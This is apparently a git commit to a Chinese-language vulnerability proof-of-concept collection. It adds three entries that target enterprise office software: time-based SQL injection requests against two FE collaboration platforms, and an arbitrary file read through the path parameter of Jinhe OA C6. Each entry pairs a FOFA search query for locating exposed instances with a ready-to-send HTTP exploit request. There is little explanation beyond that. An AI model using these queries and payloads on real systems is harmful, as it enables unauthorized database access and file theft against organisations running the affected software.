6.28更新2

2024-06-28 21:27:09 +08:00 · 2024-06-28 21:27:09 +08:00 · f814203666
commit f814203666
parent b9e7d2bd2f
4 changed files with 73 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -20,6 +20,9 @@
 - 铭飞MCMS接口upload.do存在任意文件上传漏洞
 - OpenCart开源电子商务平台divido.php存在SQL注入漏洞
 - D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞
+- 致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞
+- 飞企互联-FE企业运营管理平台efficientCodewidget39接口SQL注入漏洞
+- 金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞

 ## 2024.06.21 新增漏洞

--- a/致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞.md
+++ b/致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞.md
@ -0,0 +1,20 @@
+## 致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞
+
+## fofa
+
+```
+title="FE协作办公平台" || body="li_plugins_download"
+```
+
+## poc
+
+```
+POST /common/codeMoreWidget.js%70 HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+
+code=-1';waitfor delay '0:0:5'--
+```
+
--- a/金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞.md
+++ b/金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞.md
@ -0,0 +1,24 @@
+## 金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞
+
+金和OA `/C6/JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx` 参数path可读取任意文件。
+
+## fofa
+
+```
+body="JHSoft.Web.AddMenu" || app="金和网络-金和OA"
+```
+
+## poc
+
+```
+GET /C6/JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx/?path=/C6/js/PasswordNew.js HTTP/1.1
+Host: 
+accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: myie=false; sl-session=dFmseghQeWZR/amIUs1SMQ==; myie=false
+Connection: close
+```
+
+![image-20240628211018935](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406282110983.png)
--- a/飞企互联-FE企业运营管理平台_efficientCodewidget39接口SQL注入漏洞.md
+++ b/飞企互联-FE企业运营管理平台_efficientCodewidget39接口SQL注入漏洞.md
@ -0,0 +1,26 @@
+## 飞企互联-FE企业运营管理平台efficientCodewidget39接口SQL注入漏洞
+
+飞企互联-FE企业运营管理平台接口/common/efficientCodewidget39.jsp 存在SQL注入漏洞，可获取数据库数据。
+
+## fofa
+
+```
+app="飞企互联-FE企业运营管理平台"
+```
+
+## poc
+
+```
+GET /common/efficientCodewidget39.jsp;.js?code=1%27;waitfor+delay+%270:0:5%27--+ HTTP/1.1
+Host:
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=D92D72E197627037F9556C5625B4EFFA
+Connection: close
+```
+
+![image-20240628210729948](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406282107001.png)